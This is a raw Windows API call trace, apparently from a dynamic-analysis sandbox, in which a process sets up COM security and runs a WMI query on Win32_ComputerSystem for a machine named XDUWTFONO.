	[0267.338] WbemLocator:IUnknown:Release (This=0x7f962c) returned 0x3
	[0267.338] CoGetContextToken (in: pToken=0x5ded878 | out: pToken=0x5ded878) returned 0x0
	[0267.338] WbemLocator:IUnknown:AddRef (This=0x7f96cc) returned 0x4
	[0267.338] WbemLocator:IUnknown:QueryInterface (in: This=0x7f96cc, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded8ec | out: ppvObject=0x5ded8ec*=0x7f96b4) returned 0x0
	[0267.339] WbemLocator:IUnknown:Release (This=0x7f96cc) returned 0x4
	[0267.339] WbemLocator:IRpcOptions:Query (in: This=0x7f96b4, pPrx=0x7f96cc, dwProperty=2, pdwValue=0x5ded910 | out: pdwValue=0x5ded910) returned 0x80004002
	[0267.339] WbemLocator:IUnknown:Release (This=0x7f96b4) returned 0x3
	[0267.339] WbemLocator:IUnknown:Release (This=0x7f96cc) returned 0x2
	[0267.339] CoGetContextToken (in: pToken=0x5dedcec | out: pToken=0x5dedcec) returned 0x0
	[0267.339] CoGetContextToken (in: pToken=0x5dedcac | out: pToken=0x5dedcac) returned 0x0
	[0267.339] WbemLocator:IUnknown:AddRef (This=0x7f96cc) returned 0x3
	[0267.339] WbemLocator:IUnknown:QueryInterface (in: This=0x7f96cc, riid=0x5dedd28*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x5dedd24 | out: ppvObject=0x5dedd24*=0x635e99c) returned 0x0
	[0267.339] WbemLocator:IUnknown:Release (This=0x7f96cc) returned 0x3
	[0267.340] WbemLocator:IUnknown:Release (This=0x635e99c) returned 0x2
	[0267.340] WbemLocator:IUnknown:Release (This=0x635e99c) returned 0x1
	[0267.340] CoGetContextToken (in: pToken=0x5dee608 | out: pToken=0x5dee608) returned 0x0
	[0267.340] WbemLocator:IUnknown:AddRef (This=0x7f96cc) returned 0x2
	[0267.340] WbemLocator:IUnknown:QueryInterface (in: This=0x7f96cc, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee22c | out: ppvObject=0x5dee22c*=0x7f96cc) returned 0x0
	[0267.340] WbemLocator:IUnknown:Release (This=0x7f96cc) returned 0x2
	[0267.341] WbemLocator:IUnknown:Release (This=0x7f96cc) returned 0x1
	[0267.341] CoGetContextToken (in: pToken=0x5dede0c | out: pToken=0x5dede0c) returned 0x0
	[0267.341] CoGetContextToken (in: pToken=0x5deddcc | out: pToken=0x5deddcc) returned 0x0
	[0267.341] WbemLocator:IUnknown:AddRef (This=0x7f96cc) returned 0x2
	[0267.341] WbemLocator:IUnknown:QueryInterface (in: This=0x7f96cc, riid=0x5dede48*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x5dede44 | out: ppvObject=0x5dede44*=0x635e99c) returned 0x0
	[0267.341] WbemLocator:IUnknown:Release (This=0x7f96cc) returned 0x2
	[0267.343] WbemLocator:IUnknown:AddRef (This=0x635e99c) returned 0x3
	[0267.343] IWbemServices:ExecQuery (in: This=0x635e99c, strQueryLanguage="WQL", strQuery="select * from Win32_ComputerSystem", lFlags=16, pCtx=0x0, ppEnum=0x5dee450 | out: ppEnum=0x5dee450*=0x635ea3c) returned 0x0
	[0267.358] IUnknown:QueryInterface (in: This=0x635ea3c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee0fc | out: ppvObject=0x5dee0fc*=0x635ea40) returned 0x0
	[0267.358] IClientSecurity:QueryBlanket (in: This=0x635ea40, pProxy=0x635ea3c, pAuthnSvc=0x5dee144, pAuthzSvc=0x5dee140, pServerPrincName=0x5dee150, pAuthnLevel=0x5dee148, pImpLevel=0x5dee134, pAuthInfo=0x5dee138, pCapabilites=0x5dee13c | out: pAuthnSvc=0x5dee144*=0xa, pAuthzSvc=0x5dee140*=0x0, pServerPrincName=0x5dee150, pAuthnLevel=0x5dee148*=0x6, pImpLevel=0x5dee134*=0x2, pAuthInfo=0x5dee138, pCapabilites=0x5dee13c*=0x1) returned 0x0
	[0267.358] IUnknown:Release (This=0x635ea40) returned 0x1
	[0267.358] IUnknown:QueryInterface (in: This=0x635ea3c, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee0f0 | out: ppvObject=0x5dee0f0*=0x7f95dc) returned 0x0
	[0267.358] IUnknown:QueryInterface (in: This=0x635ea3c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee0ec | out: ppvObject=0x5dee0ec*=0x635ea40) returned 0x0
	[0267.358] IClientSecurity:SetBlanket (This=0x635ea40, pProxy=0x635ea3c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0267.363] IUnknown:Release (This=0x635ea40) returned 0x2
	[0267.363] WbemLocator:IUnknown:Release (This=0x7f95dc) returned 0x1
	[0267.363] CoTaskMemFree (pv=0x7f8498) 
	[0267.363] WbemLocator:IUnknown:Release (This=0x635e99c) returned 0x2
	[0267.363] IUnknown:QueryInterface (in: This=0x635ea3c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedaa8 | out: ppvObject=0x5dedaa8*=0x7f95dc) returned 0x0
	[0267.363] WbemLocator:IUnknown:QueryInterface (in: This=0x7f95dc, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5deda64 | out: ppvObject=0x5deda64*=0x0) returned 0x80004002
	[0267.364] WbemLocator:IUnknown:QueryInterface (in: This=0x7f95dc, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5ded958 | out: ppvObject=0x5ded958*=0x0) returned 0x80004002
	[0267.370] WbemLocator:IUnknown:AddRef (This=0x7f95dc) returned 0x3
	[0267.370] CoGetContextToken (in: pToken=0x5ded8f0 | out: pToken=0x5ded8f0) returned 0x0
	[0267.370] WbemLocator:IUnknown:QueryInterface (in: This=0x7f95dc, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded8d8 | out: ppvObject=0x5ded8d8*=0x7f953c) returned 0x0
	[0267.370] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7f953c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5ded8e0 | out: pCid=0x5ded8e0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0267.370] WbemLocator:IUnknown:Release (This=0x7f953c) returned 0x3
	[0267.370] CoGetContextToken (in: pToken=0x5ded8e8 | out: pToken=0x5ded8e8) returned 0x0
	[0267.370] WbemLocator:IUnknown:AddRef (This=0x7f95dc) returned 0x4
	[0267.370] WbemLocator:IUnknown:QueryInterface (in: This=0x7f95dc, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded95c | out: ppvObject=0x5ded95c*=0x7f95c4) returned 0x0
	[0267.370] WbemLocator:IUnknown:Release (This=0x7f95dc) returned 0x4
	[0267.371] WbemLocator:IRpcOptions:Query (in: This=0x7f95c4, pPrx=0x7f95dc, dwProperty=2, pdwValue=0x5ded980 | out: pdwValue=0x5ded980) returned 0x80004002
	[0267.371] WbemLocator:IUnknown:Release (This=0x7f95c4) returned 0x3
	[0267.371] WbemLocator:IUnknown:Release (This=0x7f95dc) returned 0x2
	[0267.371] CoGetContextToken (in: pToken=0x5dedd5c | out: pToken=0x5dedd5c) returned 0x0
	[0267.371] CoGetContextToken (in: pToken=0x5dedd1c | out: pToken=0x5dedd1c) returned 0x0
	[0267.371] WbemLocator:IUnknown:AddRef (This=0x7f95dc) returned 0x3
	[0267.371] WbemLocator:IUnknown:QueryInterface (in: This=0x7f95dc, riid=0x5dedd98*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5dedd94 | out: ppvObject=0x5dedd94*=0x635ea3c) returned 0x0
	[0267.371] WbemLocator:IUnknown:Release (This=0x7f95dc) returned 0x3
	[0267.371] IUnknown:Release (This=0x635ea3c) returned 0x2
	[0267.371] IUnknown:Release (This=0x635ea3c) returned 0x1
	[0267.371] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x63650b0, puCount=0x5dee6e8 | out: puCount=0x5dee6e8*=0x2) returned 0x0
	[0267.371] WbemDefPath:IWbemPath:GetText (in: This=0x63650b0, lFlags=4, puBuffLength=0x5dee6e4*=0x0, pszText=0x0 | out: puBuffLength=0x5dee6e4*=0x17, pszText=0x0) returned 0x0
	[0267.371] WbemDefPath:IWbemPath:GetText (in: This=0x63650b0, lFlags=4, puBuffLength=0x5dee6e4*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee6e4*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0267.372] CoGetContextToken (in: pToken=0x5dee084 | out: pToken=0x5dee084) returned 0x0
	[0267.372] CoGetContextToken (in: pToken=0x5dee044 | out: pToken=0x5dee044) returned 0x0
	[0267.372] WbemLocator:IUnknown:AddRef (This=0x7f95dc) returned 0x2
	[0267.372] WbemLocator:IUnknown:QueryInterface (in: This=0x7f95dc, riid=0x5dee0c0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5dee0bc | out: ppvObject=0x5dee0bc*=0x635ea3c) returned 0x0
	[0267.372] WbemLocator:IUnknown:Release (This=0x7f95dc) returned 0x2
	[0267.372] IUnknown:AddRef (This=0x635ea3c) returned 0x3
	[0267.372] IEnumWbemClassObject:Clone (in: This=0x635ea3c, ppEnum=0x5dee6b8 | out: ppEnum=0x5dee6b8*=0x635eb04) returned 0x0
	[0267.375] IUnknown:QueryInterface (in: This=0x635eb04, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee374 | out: ppvObject=0x5dee374*=0x635eb08) returned 0x0
	[0267.375] IClientSecurity:QueryBlanket (in: This=0x635eb08, pProxy=0x635eb04, pAuthnSvc=0x5dee3bc, pAuthzSvc=0x5dee3b8, pServerPrincName=0x5dee3c8, pAuthnLevel=0x5dee3c0, pImpLevel=0x5dee3ac, pAuthInfo=0x5dee3b0, pCapabilites=0x5dee3b4 | out: pAuthnSvc=0x5dee3bc*=0xa, pAuthzSvc=0x5dee3b8*=0x0, pServerPrincName=0x5dee3c8, pAuthnLevel=0x5dee3c0*=0x6, pImpLevel=0x5dee3ac*=0x2, pAuthInfo=0x5dee3b0, pCapabilites=0x5dee3b4*=0x1) returned 0x0
	[0267.375] IUnknown:Release (This=0x635eb08) returned 0x1
	[0267.375] IUnknown:QueryInterface (in: This=0x635eb04, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee368 | out: ppvObject=0x5dee368*=0x7f98ac) returned 0x0
	[0267.375] IUnknown:QueryInterface (in: This=0x635eb04, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee364 | out: ppvObject=0x5dee364*=0x635eb08) returned 0x0
	[0267.375] IClientSecurity:SetBlanket (This=0x635eb08, pProxy=0x635eb04, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0267.379] IUnknown:Release (This=0x635eb08) returned 0x2
	[0267.379] WbemLocator:IUnknown:Release (This=0x7f98ac) returned 0x1
	[0267.379] CoTaskMemFree (pv=0x7f8588) 
	[0267.379] IUnknown:Release (This=0x635ea3c) returned 0x2
	[0267.379] IUnknown:QueryInterface (in: This=0x635eb04, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedd10 | out: ppvObject=0x5dedd10*=0x7f98ac) returned 0x0
	[0267.380] WbemLocator:IUnknown:QueryInterface (in: This=0x7f98ac, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5dedccc | out: ppvObject=0x5dedccc*=0x0) returned 0x80004002
	[0267.381] WbemLocator:IUnknown:QueryInterface (in: This=0x7f98ac, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5dedbc0 | out: ppvObject=0x5dedbc0*=0x0) returned 0x80004002
	[0267.384] WbemLocator:IUnknown:AddRef (This=0x7f98ac) returned 0x3
	[0267.384] CoGetContextToken (in: pToken=0x5dedb58 | out: pToken=0x5dedb58) returned 0x0
	[0267.384] WbemLocator:IUnknown:QueryInterface (in: This=0x7f98ac, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedb40 | out: ppvObject=0x5dedb40*=0x7f980c) returned 0x0
	[0267.384] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7f980c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5dedb48 | out: pCid=0x5dedb48*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0267.384] WbemLocator:IUnknown:Release (This=0x7f980c) returned 0x3
	[0267.384] CoGetContextToken (in: pToken=0x5dedb50 | out: pToken=0x5dedb50) returned 0x0
	[0267.385] WbemLocator:IUnknown:AddRef (This=0x7f98ac) returned 0x4
	[0267.385] WbemLocator:IUnknown:QueryInterface (in: This=0x7f98ac, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedbc4 | out: ppvObject=0x5dedbc4*=0x7f9894) returned 0x0
	[0267.385] WbemLocator:IUnknown:Release (This=0x7f98ac) returned 0x4
	[0267.385] WbemLocator:IRpcOptions:Query (in: This=0x7f9894, pPrx=0x7f98ac, dwProperty=2, pdwValue=0x5dedbe8 | out: pdwValue=0x5dedbe8) returned 0x80004002
	[0267.385] WbemLocator:IUnknown:Release (This=0x7f9894) returned 0x3
	[0267.385] WbemLocator:IUnknown:Release (This=0x7f98ac) returned 0x2
	[0267.385] CoGetContextToken (in: pToken=0x5dedfc4 | out: pToken=0x5dedfc4) returned 0x0
	[0267.385] CoGetContextToken (in: pToken=0x5dedf84 | out: pToken=0x5dedf84) returned 0x0
	[0267.385] WbemLocator:IUnknown:AddRef (This=0x7f98ac) returned 0x3
	[0267.385] WbemLocator:IUnknown:QueryInterface (in: This=0x7f98ac, riid=0x5dee000*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5dedffc | out: ppvObject=0x5dedffc*=0x635eb04) returned 0x0
	[0267.385] WbemLocator:IUnknown:Release (This=0x7f98ac) returned 0x3
	[0267.385] IUnknown:Release (This=0x635eb04) returned 0x2
	[0267.386] IUnknown:Release (This=0x635eb04) returned 0x1
	[0267.386] CoGetContextToken (in: pToken=0x5dee5b8 | out: pToken=0x5dee5b8) returned 0x0
	[0267.386] CoGetContextToken (in: pToken=0x5dee578 | out: pToken=0x5dee578) returned 0x0
	[0267.386] WbemLocator:IUnknown:AddRef (This=0x7f98ac) returned 0x2
	[0267.386] WbemLocator:IUnknown:QueryInterface (in: This=0x7f98ac, riid=0x5dee5f4*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5dee5f0 | out: ppvObject=0x5dee5f0*=0x635eb04) returned 0x0
	[0267.386] WbemLocator:IUnknown:Release (This=0x7f98ac) returned 0x2
	[0267.386] IUnknown:AddRef (This=0x635eb04) returned 0x3
	[0267.386] IEnumWbemClassObject:Reset (This=0x635eb04) returned 0x0
	[0267.387] IUnknown:Release (This=0x635eb04) returned 0x2
	[0267.388] CoGetContextToken (in: pToken=0x5dee4ac | out: pToken=0x5dee4ac) returned 0x0
	[0267.388] IUnknown:AddRef (This=0x635eb04) returned 0x3
	[0267.388] IEnumWbemClassObject:Next (in: This=0x635eb04, lTimeout=-1, uCount=0x1, apObjects=0x769e88, puReturned=0x3220a70 | out: apObjects=0x769e88*=0x635eb40, puReturned=0x3220a70*=0x1) returned 0x0
	[0267.397] IUnknown:QueryInterface (in: This=0x635eb40, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedab8 | out: ppvObject=0x5dedab8*=0x635eb40) returned 0x0
	[0267.398] IUnknown:QueryInterface (in: This=0x635eb40, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5deda74 | out: ppvObject=0x5deda74*=0x0) returned 0x80004002
	[0267.398] IUnknown:QueryInterface (in: This=0x635eb40, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5ded968 | out: ppvObject=0x5ded968*=0x0) returned 0x80004002
	[0267.398] IUnknown:AddRef (This=0x635eb40) returned 0x3
	[0267.398] CoGetContextToken (in: pToken=0x5ded900 | out: pToken=0x5ded900) returned 0x0
	[0267.398] IUnknown:QueryInterface (in: This=0x635eb40, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded8e8 | out: ppvObject=0x5ded8e8*=0x635eb44) returned 0x0
	[0267.398] IMarshal:GetUnmarshalClass (in: This=0x635eb44, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5ded8f0 | out: pCid=0x5ded8f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0267.398] IUnknown:Release (This=0x635eb44) returned 0x3
	[0267.399] CoGetContextToken (in: pToken=0x5ded8f8 | out: pToken=0x5ded8f8) returned 0x0
	[0267.399] IUnknown:AddRef (This=0x635eb40) returned 0x4
	[0267.399] IUnknown:QueryInterface (in: This=0x635eb40, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded96c | out: ppvObject=0x5ded96c*=0x0) returned 0x80004002
	[0267.399] IUnknown:Release (This=0x635eb40) returned 0x3
	[0267.399] IUnknown:Release (This=0x635eb40) returned 0x2
	[0267.399] CoGetContextToken (in: pToken=0x5dedd58 | out: pToken=0x5dedd58) returned 0x0
	[0267.399] CoGetContextToken (in: pToken=0x5dedd18 | out: pToken=0x5dedd18) returned 0x0
	[0267.399] IUnknown:AddRef (This=0x635eb40) returned 0x3
	[0267.399] IUnknown:QueryInterface (in: This=0x635eb40, riid=0x5dedd94*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x5dedd90 | out: ppvObject=0x5dedd90*=0x635eb40) returned 0x0
	[0267.399] IUnknown:Release (This=0x635eb40) returned 0x3
	[0267.399] IUnknown:Release (This=0x635eb40) returned 0x2
	[0267.400] IUnknown:Release (This=0x635eb40) returned 0x1
	[0267.400] IUnknown:Release (This=0x635eb04) returned 0x2
	[0267.400] CoGetContextToken (in: pToken=0x5dee63c | out: pToken=0x5dee63c) returned 0x0
	[0267.400] IUnknown:AddRef (This=0x635eb40) returned 0x2
	[0267.400] IWbemClassObject:Get (in: This=0x635eb40, wszName="__GENUS", lFlags=0, pVal=0x5dee6b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x5dee76c*=0, plFlavor=0x5dee768*=0 | out: pVal=0x5dee6b8*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x5dee76c*=3, plFlavor=0x5dee768*=64) returned 0x0
	[0267.400] IWbemClassObject:Get (in: This=0x635eb40, wszName="__PATH", lFlags=0, pVal=0x5dee698*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x5dee750*=0, plFlavor=0x5dee74c*=0 | out: pVal=0x5dee698*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x5dee750*=8, plFlavor=0x5dee74c*=64) returned 0x0
	[0267.401] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0267.401] CoGetObjectContext (in: riid=0x2cbad00*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5dee6f0 | out: ppv=0x5dee6f0*=0x718dec) returned 0x0
	[0267.401] IComThreadingInfo:GetCurrentApartmentType (in: This=0x718dec, pAptType=0x5dee6e8 | out: pAptType=0x5dee6e8*=1) returned 0x0
	[0267.401] IUnknown:QueryInterface (in: This=0x718dec, riid=0x2cbace8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5dee6ec | out: ppvObject=0x5dee6ec*=0x0) returned 0x80004002
	[0267.401] IUnknown:Release (This=0x718dec) returned 0x1
	[0267.401] CoGetClassObject (in: rclsid=0x7d79e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5dee208 | out: ppv=0x5dee208*=0x635def8) returned 0x0
	[0267.401] WbemDefPath:IUnknown:QueryInterface (in: This=0x635def8, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5dee038 | out: ppvObject=0x5dee038*=0x0) returned 0x80004002
	[0267.402] WbemDefPath:IClassFactory:CreateInstance (in: This=0x635def8, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee070 | out: ppvObject=0x5dee070*=0x635e8d8) returned 0x0
	[0267.402] WbemDefPath:IUnknown:QueryInterface (in: This=0x635e8d8, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dede14 | out: ppvObject=0x5dede14*=0x635e8d8) returned 0x0
	[0267.402] WbemDefPath:IUnknown:QueryInterface (in: This=0x635e8d8, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5deddd0 | out: ppvObject=0x5deddd0*=0x0) returned 0x80004002
	[0267.402] WbemDefPath:IUnknown:AddRef (This=0x635e8d8) returned 0x3
	[0267.402] CoGetContextToken (in: pToken=0x5dedc5c | out: pToken=0x5dedc5c) returned 0x0
	[0267.402] WbemDefPath:IUnknown:QueryInterface (in: This=0x635e8d8, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedc44 | out: ppvObject=0x5dedc44*=0x639c460) returned 0x0
	[0267.403] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x639c460, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5dedc4c | out: pCid=0x5dedc4c*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
